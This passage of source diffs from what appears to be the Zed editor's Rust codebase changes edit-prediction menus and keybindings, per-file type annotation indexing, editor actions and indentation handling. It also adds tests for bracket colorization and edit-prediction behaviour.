pretty_assertions::assert_eq!(actual, expected)
}
+#[track_caller]
fn assert_definitions(definitions: &[LocationLink], first_lines: &[&str], cx: &mut TestAppContext) {
let actual_first_lines = definitions
.iter()
@@ -174,7 +174,7 @@ pub fn register_fake_definition_server(
struct DefinitionIndex {
language: Arc<Language>,
definitions: HashMap<String, Vec<lsp::Location>>,
- type_annotations: HashMap<String, String>,
+ type_annotations_by_file: HashMap<Uri, HashMap<String, String>>,
files: HashMap<Uri, FileEntry>,
}
@@ -189,7 +189,7 @@ impl DefinitionIndex {
Self {
language,
definitions: HashMap::default(),
- type_annotations: HashMap::default(),
+ type_annotations_by_file: HashMap::default(),
files: HashMap::default(),
}
}
@@ -199,6 +199,7 @@ impl DefinitionIndex {
locations.retain(|loc| &loc.uri != uri);
!locations.is_empty()
});
+ self.type_annotations_by_file.remove(uri);
self.files.remove(uri);
}
@@ -243,11 +244,11 @@ impl DefinitionIndex {
.push(location);
}
- for (identifier_name, type_name) in extract_type_annotations(content) {
- self.type_annotations
- .entry(identifier_name)
- .or_insert(type_name);
- }
+ let type_annotations = extract_type_annotations(content)
+ .into_iter()
+ .collect::<HashMap<_, _>>();
+ self.type_annotations_by_file
+ .insert(uri.clone(), type_annotations);
self.files.insert(
uri,
@@ -279,7 +280,11 @@ impl DefinitionIndex {
let entry = self.files.get(&uri)?;
let name = word_at_position(&entry.contents, position)?;
- if let Some(type_name) = self.type_annotations.get(name) {
+ if let Some(type_name) = self
+ .type_annotations_by_file
+ .get(&uri)
+ .and_then(|annotations| annotations.get(name))
+ {
if let Some(locations) = self.definitions.get(type_name) {
return Some(lsp::GotoDefinitionResponse::Array(locations.clone()));
}
@@ -367,6 +372,20 @@ fn extract_base_type_name(type_str: &str) -> String {
return outer.to_string();
}
+ if let Some(call_start) = trimmed.find("::") {
+ let outer = &trimmed[..call_start];
+ if matches!(outer, "Arc" | "Box" | "Rc" | "Option" | "Vec" | "Cow") {
+ let rest = trimmed[call_start + 2..].trim_start();
+ if let Some(paren_start) = rest.find('(') {
+ let inner = &rest[paren_start + 1..];
+ let inner = inner.trim();
+ if !inner.is_empty() {
+ return extract_base_type_name(inner);
+ }
+ }
+ }
+ }
+
trimmed
.split(|c: char| !c.is_alphanumeric() && c != '_')
.next()
@@ -359,10 +359,16 @@ impl Render for EditPredictionButton {
}
EditPredictionProvider::Mercury => {
ep_icon = if enabled { icons.base } else { icons.disabled };
+ let mercury_has_error =
+ edit_prediction::EditPredictionStore::try_global(cx).is_some_and(
+ |ep_store| ep_store.read(cx).mercury_has_payment_required_error(),
+ );
missing_token = edit_prediction::EditPredictionStore::try_global(cx)
.is_some_and(|ep_store| !ep_store.read(cx).has_mercury_api_token(cx));
tooltip_meta = if missing_token {
"Missing API key for Mercury"
+ } else if mercury_has_error {
+ "Mercury free tier limit reached"
} else {
"Powered by Mercury"
};
@@ -373,7 +379,7 @@ impl Render for EditPredictionButton {
}
};
- if edit_prediction::should_show_upsell_modal() {
+ if edit_prediction::should_show_upsell_modal(cx) {
let tooltip_meta = if self.user_store.read(cx).current_user().is_some() {
"Choose a Plan"
} else {
@@ -414,7 +420,12 @@ impl Render for EditPredictionButton {
let show_editor_predictions = self.editor_show_predictions;
let user = self.user_store.read(cx).current_user();
- let indicator_color = if missing_token {
+ let mercury_has_error = matches!(provider, EditPredictionProvider::Mercury)
+ && edit_prediction::EditPredictionStore::try_global(cx).is_some_and(
+ |ep_store| ep_store.read(cx).mercury_has_payment_required_error(),
+ );
+
+ let indicator_color = if missing_token || mercury_has_error {
Some(Color::Error)
} else if enabled && (!show_editor_predictions || over_limit) {
Some(if over_limit {
@@ -1096,96 +1107,116 @@ impl EditPredictionButton {
},
)
.separator();
- } else if let Some(usage) = self
- .edit_prediction_provider
- .as_ref()
- .and_then(|provider| provider.usage(cx))
- {
- menu = menu.header("Usage");
- menu = menu
- .custom_entry(
- move |_window, cx| {
- let used_percentage = match usage.limit {
- UsageLimit::Limited(limit) => {
- Some((usage.amount as f32 / limit as f32) * 100.)
- }
- UsageLimit::Unlimited => None,
- };
+ } else {
+ let mercury_payment_required = matches!(provider, EditPredictionProvider::Mercury)
+ && edit_prediction::EditPredictionStore::try_global(cx).is_some_and(
+ |ep_store| ep_store.read(cx).mercury_has_payment_required_error(),
+ );
+
+ if mercury_payment_required {
+ menu = menu
+ .header("Mercury")
+ .item(ContextMenuEntry::new("Free tier limit reached").disabled(true))
+ .item(
+ ContextMenuEntry::new(
+ "Upgrade to a paid plan to continue using the service",
+ )
+ .disabled(true),
+ )
+ .separator();
+ }
+
+ if let Some(usage) = self
+ .edit_prediction_provider
+ .as_ref()
+ .and_then(|provider| provider.usage(cx))
+ {
+ menu = menu.header("Usage");
+ menu = menu
+ .custom_entry(
+ move |_window, cx| {
+ let used_percentage = match usage.limit {
+ UsageLimit::Limited(limit) => {
+ Some((usage.amount as f32 / limit as f32) * 100.)
+ }
+ UsageLimit::Unlimited => None,
+ };
- h_flex()
- .flex_1()
- .gap_1p5()
- .children(
- used_percentage.map(|percent| {
+ h_flex()
+ .flex_1()
+ .gap_1p5()
+ .children(used_percentage.map(|percent| {
ProgressBar::new("usage", percent, 100., cx)
- }),
- )
- .child(
- Label::new(match usage.limit {
- UsageLimit::Limited(limit) => {
- format!("{} / {limit}", usage.amount)
- }
- UsageLimit::Unlimited => format!("{} / ∞", usage.amount),
- })
+ }))
+ .child(
+ Label::new(match usage.limit {
+ UsageLimit::Limited(limit) => {
+ format!("{} / {limit}", usage.amount)
+ }
+ UsageLimit::Unlimited => {
+ format!("{} / ∞", usage.amount)
+ }
+ })
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ )
+ .into_any_element()
+ },
+ move |_, cx| cx.open_url(&zed_urls::account_url(cx)),
+ )
+ .when(usage.over_limit(), |menu| -> ContextMenu {
+ menu.entry("Subscribe to increase your limit", None, |_window, cx| {
+ telemetry::event!(
+ "Edit Prediction Menu Action",
+ action = "upsell_clicked",
+ reason = "usage_limit",
+ );
+ cx.open_url(&zed_urls::account_url(cx))
+ })
+ })
+ .separator();
+ } else if self.user_store.read(cx).account_too_young() {
+ menu = menu
+ .custom_entry(
+ |_window, _cx| {
+ Label::new("Your GitHub account is less than 30 days old.")
.size(LabelSize::Small)
- .color(Color::Muted),
- )
- .into_any_element()
- },
- move |_, cx| cx.open_url(&zed_urls::account_url(cx)),
- )
- .when(usage.over_limit(), |menu| -> ContextMenu {
- menu.entry("Subscribe to increase your limit", None, |_window, cx| {
+ .color(Color::Warning)
+ .into_any_element()
+ },
+ |_window, cx| cx.open_url(&zed_urls::account_url(cx)),
+ )
+ .entry("Upgrade to Zed Pro or contact us.", None, |_window, cx| {
telemetry::event!(
"Edit Prediction Menu Action",
action = "upsell_clicked",
- reason = "usage_limit",
+ reason = "account_age",
);
cx.open_url(&zed_urls::account_url(cx))
})
- })
- .separator();
- } else if self.user_store.read(cx).account_too_young() {
- menu = menu
- .custom_entry(
- |_window, _cx| {
- Label::new("Your GitHub account is less than 30 days old.")
- .size(LabelSize::Small)
- .color(Color::Warning)
- .into_any_element()
- },
- |_window, cx| cx.open_url(&zed_urls::account_url(cx)),
- )
- .entry("Upgrade to Zed Pro or contact us.", None, |_window, cx| {
- telemetry::event!(
- "Edit Prediction Menu Action",
- action = "upsell_clicked",
- reason = "account_age",
- );
- cx.open_url(&zed_urls::account_url(cx))
- })
- .separator();
- } else if self.user_store.read(cx).has_overdue_invoices() {
- menu = menu
- .custom_entry(
- |_window, _cx| {
- Label::new("You have an outstanding invoice")
- .size(LabelSize::Small)
- .color(Color::Warning)
- .into_any_element()
- },
- |_window, cx| {
- cx.open_url(&zed_urls::account_url(cx))
- },
- )
- .entry(
- "Check your payment status or contact us at billing-support@zed.dev to continue using this feature.",
- None,
- |_window, cx| {
- cx.open_url(&zed_urls::account_url(cx))
- },
- )
- .separator();
+ .separator();
+ } else if self.user_store.read(cx).has_overdue_invoices() {
+ menu = menu
+ .custom_entry(
+ |_window, _cx| {
+ Label::new("You have an outstanding invoice")
+ .size(LabelSize::Small)
+ .color(Color::Warning)
+ .into_any_element()
+ },
+ |_window, cx| {
+ cx.open_url(&zed_urls::account_url(cx))
+ },
+ )
+ .entry(
+ "Check your payment status or contact us at billing-support@zed.dev to continue using this feature.",
+ None,
+ |_window, cx| {
+ cx.open_url(&zed_urls::account_url(cx))
+ },
+ )
+ .separator();
+ }
}
if !needs_sign_in {
@@ -13,7 +13,7 @@ use project::{
};
use settings::Settings as _;
use std::rc::Rc;
-use std::{fmt::Write, sync::Arc, time::Duration};
+use std::{fmt::Write, sync::Arc};
use theme::ThemeSettings;
use ui::{
ContextMenu, DropdownMenu, KeyBinding, List, ListItem, ListItemSpacing, PopoverMenuHandle,
@@ -765,9 +765,7 @@ impl RatePredictionsModal {
.gap_1()
.child(
Button::new("bad", "Bad Prediction")
- .icon(IconName::ThumbsDown)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::ThumbsDown).size(IconSize::Small))
.disabled(rated || feedback_empty)
.when(feedback_empty, |this| {
this.tooltip(Tooltip::text(
@@ -791,9 +789,7 @@ impl RatePredictionsModal {
)
.child(
Button::new("good", "Good Prediction")
- .icon(IconName::ThumbsUp)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::ThumbsUp).size(IconSize::Small))
.disabled(rated)
.key_binding(KeyBinding::for_action_in(
&ThumbsUpActivePrediction,
@@ -854,30 +850,18 @@ impl RatePredictionsModal {
.gap_3()
.child(Icon::new(icon_name).color(icon_color).size(IconSize::Small))
.child(
- v_flex()
- .child(
- h_flex()
- .gap_1()
- .child(Label::new(file_name).size(LabelSize::Small))
- .when_some(file_path, |this, p| {
- this.child(
- Label::new(p)
- .size(LabelSize::Small)
- .color(Color::Muted),
- )
- }),
- )
- .child(
- Label::new(format!(
- "{} ago, {:.2?}",
- format_time_ago(
- completion.response_received_at.elapsed()
- ),
- completion.latency()
- ))
- .color(Color::Muted)
- .size(LabelSize::XSmall),
- ),
+ v_flex().child(
+ h_flex()
+ .gap_1()
+ .child(Label::new(file_name).size(LabelSize::Small))
+ .when_some(file_path, |this, p| {
+ this.child(
+ Label::new(p)
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ )
+ }),
+ ),
),
)
.tooltip(Tooltip::text(tooltip_text))
@@ -981,23 +965,6 @@ impl Focusable for RatePredictionsModal {
impl ModalView for RatePredictionsModal {}
-fn format_time_ago(elapsed: Duration) -> String {
- let seconds = elapsed.as_secs();
- if seconds < 120 {
- "1 minute".to_string()
- } else if seconds < 3600 {
- format!("{} minutes", seconds / 60)
- } else if seconds < 7200 {
- "1 hour".to_string()
- } else if seconds < 86400 {
- format!("{} hours", seconds / 3600)
- } else if seconds < 172800 {
- "1 day".to_string()
- } else {
- format!("{} days", seconds / 86400)
- }
-}
-
struct FeedbackCompletionProvider;
impl FeedbackCompletionProvider {
@@ -568,6 +568,10 @@ actions!(
GoToParentModule,
/// Goes to the previous change in the file.
GoToPreviousChange,
+ /// Goes to the next symbol.
+ GoToNextSymbol,
+ /// Goes to the previous symbol.
+ GoToPreviousSymbol,
/// Goes to the next reference to the symbol under the cursor.
GoToNextReference,
/// Goes to the previous reference to the symbol under the cursor.
@@ -695,8 +699,6 @@ actions!(
Rename,
/// Restarts the language server for the current file.
RestartLanguageServer,
- /// Reveals the current file in the system file manager.
- RevealInFileManager,
/// Reverses the order of selected lines.
ReverseLines,
/// Reloads the file from disk.
@@ -879,6 +881,8 @@ actions!(
UnwrapSyntaxNode,
/// Wraps selections in tag specified by language.
WrapSelectionsInTag,
+ /// Aligns selections from different rows into the same column.
+ AlignSelections,
]
);
@@ -392,6 +392,20 @@ where
&bracket_colors_markup(&mut cx),
"All markdown brackets should be colored based on their depth, again"
);
+
+ cx.set_state(indoc! {r#"ˇ('')('')
+
+((''))('')
+
+('')((''))"#});
+ cx.executor().advance_clock(Duration::from_millis(100));
+ cx.executor().run_until_parked();
+
+ assert_eq!(
+ "«1('')1»«1('')1»\n\n«1(«2('')2»)1»«1('')1»\n\n«1('')1»«1(«2('')2»)1»\n1 hsla(207.80, 16.20%, 69.19%, 1.00)\n2 hsla(29.00, 54.00%, 65.88%, 1.00)\n",
+ &bracket_colors_markup(&mut cx),
+ "Markdown quote pairs should not interfere with parenthesis pairing"
+ );
}
#[gpui::test]
@@ -1455,6 +1469,60 @@ mod foo «1{
);
}
+ #[gpui::test]
+ // Reproduction of #47846.
+ async fn test_bracket_colorization_with_folds(cx: &mut gpui::TestAppContext) {
+ init_test(cx, |language_settings| {
+ language_settings.defaults.colorize_brackets = Some(true);
+ });
+ let mut cx = EditorLspTestContext::new(
+ Arc::into_inner(rust_lang()).unwrap(),
+ lsp::ServerCapabilities::default(),
+ cx,
+ )
+ .await;
+
+ // Generate a large function body. When folded, this collapses
+ // to a single display line, making small_function visible on screen.
+ let mut big_body = String::new();
+ for i in 0..700 {
+ big_body.push_str(&format!(" let var_{i:04} = ({i});\n"));
+ }
+ let source = format!(
+ "ˇfn big_function() {{\n{big_body}}}\n\nfn small_function() {{\n let x = (1, (2, 3));\n}}\n"
+ );
+
+ cx.set_state(&source);
+ cx.executor().advance_clock(Duration::from_millis(100));
+ cx.executor().run_until_parked();
+
+ cx.update_editor(|editor, window, cx| {
+ editor.fold_ranges(
+ vec![Point::new(0, 0)..Point::new(701, 1)],
+ false,
+ window,
+ cx,
+ );
+ });
+ cx.executor().advance_clock(Duration::from_millis(100));
+ cx.executor().run_until_parked();
+
+ assert_eq!(
+ indoc! {r#"
+⋯1»
+
+fn small_function«1()1» «1{
+ let x = «2(1, «3(2, 3)3»)2»;
+}1»
+
+1 hsla(207.80, 16.20%, 69.19%, 1.00)
+2 hsla(29.00, 54.00%, 65.88%, 1.00)
+3 hsla(286.00, 51.00%, 75.25%, 1.00)
+"#,},
+ bracket_colors_markup(&mut cx),
+ );
+ }
+
fn separate_with_comment_lines(head: &str, tail: &str, comment_lines: usize) -> String {
let mut result = head.to_string();
result.push_str("\n");
@@ -2320,6 +2320,19 @@ impl DisplaySnapshot {
if !line_indent.is_line_blank()
&& line_indent.raw_len() <= start_line_indent.raw_len()
{
+ if self
+ .buffer_snapshot()
+ .language_scope_at(Point::new(row, 0))
+ .is_some_and(|scope| {
+ matches!(
+ scope.override_name(),
+ Some("string") | Some("comment") | Some("comment.inclusive")
+ )
+ })
+ {
+ continue;
+ }
+
let prev_row = row - 1;
end = Some(Point::new(
prev_row,
@@ -145,7 +145,7 @@ impl Editor {
_: &Window,
cx: &mut Context<Self>,
) {
- if !self.mode().is_full() {
+ if !self.lsp_data_enabled() {
return;
}
let Some(project) = self.project.as_ref() else {
@@ -147,7 +147,7 @@ impl Editor {
for_buffer: Option<BufferId>,
cx: &mut Context<Self>,
) {
- if !self.mode().is_full() {
+ if !self.lsp_data_enabled() {
return;
}
let Some(project) = self.project.clone() else {
@@ -1,17 +1,34 @@
use edit_prediction_types::{
EditPredictionDelegate, EditPredictionIconSet, PredictedCursorPosition,
};
-use gpui::{Entity, KeyBinding, Modifiers, prelude::*};
+use gpui::{
+ Entity, KeyBinding, KeybindingKeystroke, Keystroke, Modifiers, NoAction, Task, prelude::*,
+};
use indoc::indoc;
-use multi_buffer::{Anchor, MultiBufferSnapshot, ToPoint};
-use std::{ops::Range, sync::Arc};
+use language::EditPredictionsMode;
+use language::{Buffer, CodeLabel};
+use multi_buffer::{Anchor, ExcerptId, MultiBufferSnapshot, ToPoint};
+use project::{Completion, CompletionResponse, CompletionSource};
+use std::{
+ ops::Range,
+ rc::Rc,
+ sync::{
+ Arc,
+ atomic::{self, AtomicUsize},
+ },
+};
use text::{Point, ToOffset};
use ui::prelude::*;
use crate::{
- AcceptEditPrediction, EditPrediction, MenuEditPredictionsPolicy, editor_tests::init_test,
+ AcceptEditPrediction, CompletionContext, CompletionProvider, EditPrediction,
+ EditPredictionKeybindAction, EditPredictionKeybindSurface, MenuEditPredictionsPolicy,
+ ShowCompletions,
+ editor_tests::{init_test, update_test_language_settings},
test::editor_test_context::EditorTestContext,
};
+use rpc::proto::PeerId;
+use workspace::CollaboratorId;
#[gpui::test]
async fn test_edit_prediction_insert(cx: &mut gpui::TestAppContext) {
@@ -359,6 +376,60 @@ async fn test_edit_prediction_jump_disabled_for_non_zed_providers(cx: &mut gpui:
});
}
+#[gpui::test]
+async fn test_edit_prediction_refresh_suppressed_while_following(cx: &mut gpui::TestAppContext) {
+ init_test(cx, |_| {});
+
+ let mut cx = EditorTestContext::new(cx).await;
+ let provider = cx.new(|_| FakeEditPredictionDelegate::default());
+ assign_editor_completion_provider(provider.clone(), &mut cx);
+ cx.set_state("let x = ˇ;");
+
+ propose_edits(&provider, vec![(8..8, "42")], &mut cx);
+
+ cx.update_editor(|editor, window, cx| {
+ editor.refresh_edit_prediction(false, false, window, cx);
+ editor.update_visible_edit_prediction(window, cx);
+ });
+
+ assert_eq!(
+ provider.read_with(&cx.cx, |provider, _| {
+ provider.refresh_count.load(atomic::Ordering::SeqCst)
+ }),
+ 1
+ );
+ cx.editor(|editor, _, _| {
+ assert!(editor.active_edit_prediction.is_some());
+ });
+
+ cx.update_editor(|editor, window, cx| {
+ editor.leader_id = Some(CollaboratorId::PeerId(PeerId::default()));
+ editor.refresh_edit_prediction(false, false, window, cx);
+ });
+
+ assert_eq!(
+ provider.read_with(&cx.cx, |provider, _| {
+ provider.refresh_count.load(atomic::Ordering::SeqCst)
+ }),
+ 1
+ );
+ cx.editor(|editor, _, _| {
+ assert!(editor.active_edit_prediction.is_none());
+ });
+
+ cx.update_editor(|editor, window, cx| {
+ editor.leader_id = None;
+ editor.refresh_edit_prediction(false, false, window, cx);
+ });
+
+ assert_eq!(
+ provider.read_with(&cx.cx, |provider, _| {
+ provider.refresh_count.load(atomic::Ordering::SeqCst)
+ }),
+ 2
+ );
+}
+
#[gpui::test]
async fn test_edit_prediction_preview_cleanup_on_toggle_off(cx: &mut gpui::TestAppContext) {
init_test(cx, |_| {});
@@ -416,6 +487,537 @@ async fn test_edit_prediction_preview_cleanup_on_toggle_off(cx: &mut gpui::TestA
});
}
+#[gpui::test]
+async fn test_edit_prediction_preview_activates_when_prediction_arrives_with_modifier_held(
+ cx: &mut gpui::TestAppContext,
+) {
+ init_test(cx, |_| {});
+ load_default_keymap(cx);
+ update_test_language_settings(cx, &|settings| {
+ settings.edit_predictions.get_or_insert_default().mode = Some(EditPredictionsMode::Subtle);
+ });
+
+ let mut cx = EditorTestContext::new(cx).await;
+ let provider = cx.new(|_| FakeEditPredictionDelegate::default());
+ assign_editor_completion_provider(provider.clone(), &mut cx);
+ cx.set_state("let x = ˇ;");
+
+ cx.editor(|editor, _, _| {
+ assert!(!editor.has_active_edit_prediction());
+ assert!(!editor.edit_prediction_preview_is_active());
+ });
+
+ let preview_modifiers = cx.update_editor(|editor, window, cx| {
+ *editor
+ .preview_edit_prediction_keystroke(window, cx)
+ .unwrap()
+ .modifiers()
+ });
+
+ cx.simulate_modifiers_change(preview_modifiers);
+ cx.run_until_parked();
+
+ cx.editor(|editor, _, _| {
+ assert!(!editor.has_active_edit_prediction());
+ assert!(editor.edit_prediction_preview_is_active());
+ });
+
+ propose_edits(&provider, vec![(8..8, "42")], &mut cx);
+ cx.update_editor(|editor, window, cx| {
+ editor.set_menu_edit_predictions_policy(MenuEditPredictionsPolicy::ByProvider);
+ editor.update_visible_edit_prediction(window, cx)
+ });
+
+ cx.editor(|editor, _, _| {
+ assert!(editor.has_active_edit_prediction());
+ assert!(
+ editor.edit_prediction_preview_is_active(),
+ "prediction preview should activate immediately when the prediction arrives while the preview modifier is still held",
+ );
+ });
+}
+
+fn load_default_keymap(cx: &mut gpui::TestAppContext) {
+ cx.update(|cx| {
+ cx.bind_keys(
+ settings::KeymapFile::load_asset_allow_partial_failure(
+ settings::DEFAULT_KEYMAP_PATH,
+ cx,
+ )
+ .expect("failed to load default keymap"),
+ );
+ });
+}
+
+#[gpui::test]
+async fn test_inline_edit_prediction_keybind_selection_cases(cx: &mut gpui::TestAppContext) {
+ enum InlineKeybindState {
+ Normal,
+ ShowingCompletions,
+ InLeadingWhitespace,
+ ShowingCompletionsAndLeadingWhitespace,
+ }
+
+ enum ExpectedKeystroke {
+ DefaultAccept,
+ DefaultPreview,
+ Literal(&'static str),
+ }
+
+ struct InlineKeybindCase {
+ name: &'static str,
+ use_default_keymap: bool,
+ mode: EditPredictionsMode,
+ extra_bindings: Vec<KeyBinding>,
+ state: InlineKeybindState,
+ expected_accept_keystroke: ExpectedKeystroke,
+ expected_preview_keystroke: ExpectedKeystroke,
+ expected_displayed_keystroke: ExpectedKeystroke,
+ }
+
+ init_test(cx, |_| {});
+ load_default_keymap(cx);
+ let mut default_cx = EditorTestContext::new(cx).await;
+ let provider = default_cx.new(|_| FakeEditPredictionDelegate::default());
+ assign_editor_completion_provider(provider.clone(), &mut default_cx);
+ default_cx.set_state("let x = ˇ;");
+ propose_edits(&provider, vec![(8..8, "42")], &mut default_cx);
+ default_cx
+ .update_editor(|editor, window, cx| editor.update_visible_edit_prediction(window, cx));
+
+ let (default_accept_keystroke, default_preview_keystroke) =
+ default_cx.update_editor(|editor, window, cx| {
+ let keybind_display = editor.edit_prediction_keybind_display(
+ EditPredictionKeybindSurface::Inline,
+ window,
+ cx,
+ );
+ let accept_keystroke = keybind_display
+ .accept_keystroke
+ .as_ref()
+ .expect("default inline edit prediction should have an accept binding")
+ .clone();
+ let preview_keystroke = keybind_display
+ .preview_keystroke
+ .as_ref()
+ .expect("default inline edit prediction should have a preview binding")
+ .clone();
+ (accept_keystroke, preview_keystroke)
+ });
+
+ let cases = [
+ InlineKeybindCase {
+ name: "default setup prefers tab over alt-tab for accept",
+ use_default_keymap: true,
+ mode: EditPredictionsMode::Eager,
+ extra_bindings: Vec::new(),
+ state: InlineKeybindState::Normal,
+ expected_accept_keystroke: ExpectedKeystroke::DefaultAccept,
+ expected_preview_keystroke: ExpectedKeystroke::DefaultPreview,
+ expected_displayed_keystroke: ExpectedKeystroke::DefaultAccept,
+ },
+ InlineKeybindCase {
+ name: "subtle mode displays preview binding inline",
+ use_default_keymap: true,
+ mode: EditPredictionsMode::Subtle,
+ extra_bindings: Vec::new(),
+ state: InlineKeybindState::Normal,
+ expected_accept_keystroke: ExpectedKeystroke::DefaultPreview,
+ expected_preview_keystroke: ExpectedKeystroke::DefaultPreview,
+ expected_displayed_keystroke: ExpectedKeystroke::DefaultPreview,
+ },
+ InlineKeybindCase {
+ name: "removing default tab binding still displays tab",
+ use_default_keymap: true,
+ mode: EditPredictionsMode::Eager,
+ extra_bindings: vec![KeyBinding::new(
+ "tab",
+ NoAction,
+ Some("Editor && edit_prediction && edit_prediction_mode == eager"),
+ )],
+ state: InlineKeybindState::Normal,
+ expected_accept_keystroke: ExpectedKeystroke::DefaultPreview,
+ expected_preview_keystroke: ExpectedKeystroke::DefaultPreview,
+ expected_displayed_keystroke: ExpectedKeystroke::DefaultPreview,
+ },
+ InlineKeybindCase {
+ name: "custom-only rebound accept key uses replacement key",
+ use_default_keymap: true,
+ mode: EditPredictionsMode::Eager,
+ extra_bindings: vec![KeyBinding::new(
+ "ctrl-enter",
+ AcceptEditPrediction,
+ Some("Editor && edit_prediction"),
+ )],
+ state: InlineKeybindState::Normal,
+ expected_accept_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ expected_preview_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ expected_displayed_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ },
+ InlineKeybindCase {
+ name: "showing completions restores conflict-context binding",
+ use_default_keymap: true,
+ mode: EditPredictionsMode::Eager,
+ extra_bindings: vec![KeyBinding::new(
+ "ctrl-enter",
+ AcceptEditPrediction,
+ Some("Editor && edit_prediction && showing_completions"),
+ )],
+ state: InlineKeybindState::ShowingCompletions,
+ expected_accept_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ expected_preview_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ expected_displayed_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ },
+ InlineKeybindCase {
+ name: "leading whitespace restores conflict-context binding",
+ use_default_keymap: false,
+ mode: EditPredictionsMode::Eager,
+ extra_bindings: vec![KeyBinding::new(
+ "ctrl-enter",
+ AcceptEditPrediction,
+ Some("Editor && edit_prediction && in_leading_whitespace"),
+ )],
+ state: InlineKeybindState::InLeadingWhitespace,
+ expected_accept_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ expected_preview_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ expected_displayed_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ },
+ InlineKeybindCase {
+ name: "showing completions and leading whitespace restore combined conflict binding",
+ use_default_keymap: false,
+ mode: EditPredictionsMode::Eager,
+ extra_bindings: vec![KeyBinding::new(
+ "ctrl-enter",
+ AcceptEditPrediction,
+ Some("Editor && edit_prediction && showing_completions && in_leading_whitespace"),
+ )],
+ state: InlineKeybindState::ShowingCompletionsAndLeadingWhitespace,
+ expected_accept_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ expected_preview_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ expected_displayed_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ },
+ ];
+
+ for case in cases {
+ init_test(cx, |_| {});
+ if case.use_default_keymap {
+ load_default_keymap(cx);
+ }
+ update_test_language_settings(cx, &|settings| {
+ settings.edit_predictions.get_or_insert_default().mode = Some(case.mode);
+ });
+
+ if !case.extra_bindings.is_empty() {
+ cx.update(|cx| cx.bind_keys(case.extra_bindings.clone()));
+ }
+
+ let mut cx = EditorTestContext::new(cx).await;
+ let provider = cx.new(|_| FakeEditPredictionDelegate::default());
+ assign_editor_completion_provider(provider.clone(), &mut cx);
+
+ match case.state {
+ InlineKeybindState::Normal | InlineKeybindState::ShowingCompletions => {
+ cx.set_state("let x = ˇ;");
+ }
+ InlineKeybindState::InLeadingWhitespace
+ | InlineKeybindState::ShowingCompletionsAndLeadingWhitespace => {
+ cx.set_state(indoc! {"
+ fn main() {
+ ˇ
+ }
+ "});
+ }
+ }
+
+ propose_edits(&provider, vec![(8..8, "42")], &mut cx);
+ cx.update_editor(|editor, window, cx| editor.update_visible_edit_prediction(window, cx));
+
+ if matches!(
+ case.state,
+ InlineKeybindState::ShowingCompletions
+ | InlineKeybindState::ShowingCompletionsAndLeadingWhitespace
+ ) {
+ assign_editor_completion_menu_provider(&mut cx);
+ cx.update_editor(|editor, window, cx| {
+ editor.show_completions(&ShowCompletions, window, cx);
+ });
+ cx.run_until_parked();
+ }
+
+ cx.update_editor(|editor, window, cx| {
+ assert!(
+ editor.has_active_edit_prediction(),
+ "case '{}' should have an active edit prediction",
+ case.name
+ );
+
+ let keybind_display = editor.edit_prediction_keybind_display(
+ EditPredictionKeybindSurface::Inline,
+ window,
+ cx,
+ );
+ let accept_keystroke = keybind_display
+ .accept_keystroke
+ .as_ref()
+ .unwrap_or_else(|| panic!("case '{}' should have an accept binding", case.name));
+ let preview_keystroke = keybind_display
+ .preview_keystroke
+ .as_ref()
+ .unwrap_or_else(|| panic!("case '{}' should have a preview binding", case.name));
+ let displayed_keystroke = keybind_display
+ .displayed_keystroke
+ .as_ref()
+ .unwrap_or_else(|| panic!("case '{}' should have a displayed binding", case.name));
+
+ let expected_accept_keystroke = match case.expected_accept_keystroke {
+ ExpectedKeystroke::DefaultAccept => default_accept_keystroke.clone(),
+ ExpectedKeystroke::DefaultPreview => default_preview_keystroke.clone(),
+ ExpectedKeystroke::Literal(keystroke) => KeybindingKeystroke::from_keystroke(
+ Keystroke::parse(keystroke).expect("expected test keystroke to parse"),
+ ),
+ };
+ let expected_preview_keystroke = match case.expected_preview_keystroke {
+ ExpectedKeystroke::DefaultAccept => default_accept_keystroke.clone(),
+ ExpectedKeystroke::DefaultPreview => default_preview_keystroke.clone(),
+ ExpectedKeystroke::Literal(keystroke) => KeybindingKeystroke::from_keystroke(
+ Keystroke::parse(keystroke).expect("expected test keystroke to parse"),
+ ),
+ };
+ let expected_displayed_keystroke = match case.expected_displayed_keystroke {
+ ExpectedKeystroke::DefaultAccept => default_accept_keystroke.clone(),
+ ExpectedKeystroke::DefaultPreview => default_preview_keystroke.clone(),
+ ExpectedKeystroke::Literal(keystroke) => KeybindingKeystroke::from_keystroke(
+ Keystroke::parse(keystroke).expect("expected test keystroke to parse"),
+ ),
+ };
+
+ assert_eq!(
+ accept_keystroke, &expected_accept_keystroke,
+ "case '{}' selected the wrong accept binding",
+ case.name
+ );
+ assert_eq!(
+ preview_keystroke, &expected_preview_keystroke,
+ "case '{}' selected the wrong preview binding",
+ case.name
+ );
+ assert_eq!(
+ displayed_keystroke, &expected_displayed_keystroke,
+ "case '{}' selected the wrong displayed binding",
+ case.name
+ );
+
+ if matches!(case.mode, EditPredictionsMode::Subtle) {
+ assert!(
+ editor.edit_prediction_requires_modifier(),
+ "case '{}' should require a modifier",
+ case.name
+ );
+ }
+ });
+ }
+}
+
+#[gpui::test]
+async fn test_tab_accepts_edit_prediction_over_completion(cx: &mut gpui::TestAppContext) {
+ init_test(cx, |_| {});
+ load_default_keymap(cx);
+
+ let mut cx = EditorTestContext::new(cx).await;
+ let provider = cx.new(|_| FakeEditPredictionDelegate::default());
+ assign_editor_completion_provider(provider.clone(), &mut cx);
+ cx.set_state("let x = ˇ;");
+
+ propose_edits(&provider, vec![(8..8, "42")], &mut cx);
+ cx.update_editor(|editor, window, cx| editor.update_visible_edit_prediction(window, cx));
+
+ assert_editor_active_edit_completion(&mut cx, |_, edits| {
